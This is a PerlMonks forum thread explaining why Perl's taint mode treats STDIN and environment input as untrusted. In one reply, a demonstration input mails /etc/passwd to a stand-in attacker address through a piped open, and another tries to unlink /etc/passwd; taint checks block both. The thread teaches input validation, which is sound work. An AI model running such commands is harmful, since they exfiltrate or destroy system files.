in reply to Re^3: Insecure dependency in open
in thread Insecure dependency in open

Ok, then can you please clarify why STDIN is tainted? I'm scratchin' my head long and hard on this one? What's perl protecting me from now?

Dan Heller
http://www.danheller.com

Replies are listed 'Best First'.
Re^5: Insecure dependency in open
by ikegami (Patriarch) on Jan 22, 2007 at 18:49 UTC

    Taint should be used when the caller of the script is different than the person who owns the script. setuid scripts, CGI scripts, etc. should use it. The environment, files, STDIN, command line arguments, etc are controlled by the caller and cannot be trusted. To allow the user to specify a file name (for example) could allow him to read and/or modify files to which he normally would not have access.

[reply]
      Yes, I know the doc. I'm just asking why STDIN is part of that group, especially for -t STDIN.

      Dan Heller
      http://www.danheller.com
[reply]
[d/l]

        I already explained and I even gave you an example. I don't know what more you want. Give me an idea?

        In the most basic of terms, -T means don't trust the user. The user controls STDIN, so it must not be trusted.

[reply]
[d/l]
[select]
Re^5: Insecure dependency in open
by Fletch (Bishop) on Jan 22, 2007 at 19:54 UTC

    It's dangerous because it comes from a dirty, untrustworthy, malicious creature (i.e. the user). They can feed in anything they want on STDIN: 

    $ perl -T -le 'chomp(my $foo = <STDIN>);unlink( $foo ) or die "unlink:
+ $!\n";'      
/etc/passwd
Insecure dependency in unlink while running with -T switch at -e line 
+1, <STDIN> line 1.
$ perl -T -le '$ENV{PATH}="/bin:/usr/bin"; chomp(my $foo = <STDIN>);op
+en( FOO, $foo ) or die "unlink: $!\n";'
mail blackhat@evilhaxor.org -s `uname -n` < /etc/passwd ; cat /dev/nul
+l |
Insecure dependency in piped open while running with -T switch at -e l
+ine 1, <STDIN> line 1.

    [download]

    If you want to allow this, you have to explicitly validate (by means of some form of untainting) the input; and on your head be it if you do it wrong.

    Update: And as to your question about -t STDIN, that shouldn't be a problem because it's testing a property of the handle not using any input from the handle. 

    $ perl -T -le 'print "tty" if -t STDIN'
tty

    [download]
[reply]
[d/l]
[select]
      Whoops! Completely disregard this post. I thought at the time that perl wasn't even letting me read from STDIN but it is. That changes my recently follow-up question thread, which can now be discarded. (I thought perl wasn't letting me set a variable from STDIN.). Mea culpa. More later...

      Dan Heller
      http://www.danheller.com
[reply]

        I don't yet see how calling $filename = <STDIN> is any different than saying $filename = $ENV{HOME}.

        They're not. 

        >echo "input" | perl -T -e "use Scalar::Util qw( tainted ); my $var = 
+<STDIN>; print(tainted($var)?1:0, qq{\n})"
1

>set VAR=input & perl -T -e "use Scalar::Util qw( tainted ); my $var =
+ $ENV{VAR}; print(tainted($var)?1:0, qq{\n})"
1

        [download]
[reply]
[d/l]
[select]

In Section Seekers of Perl Wisdom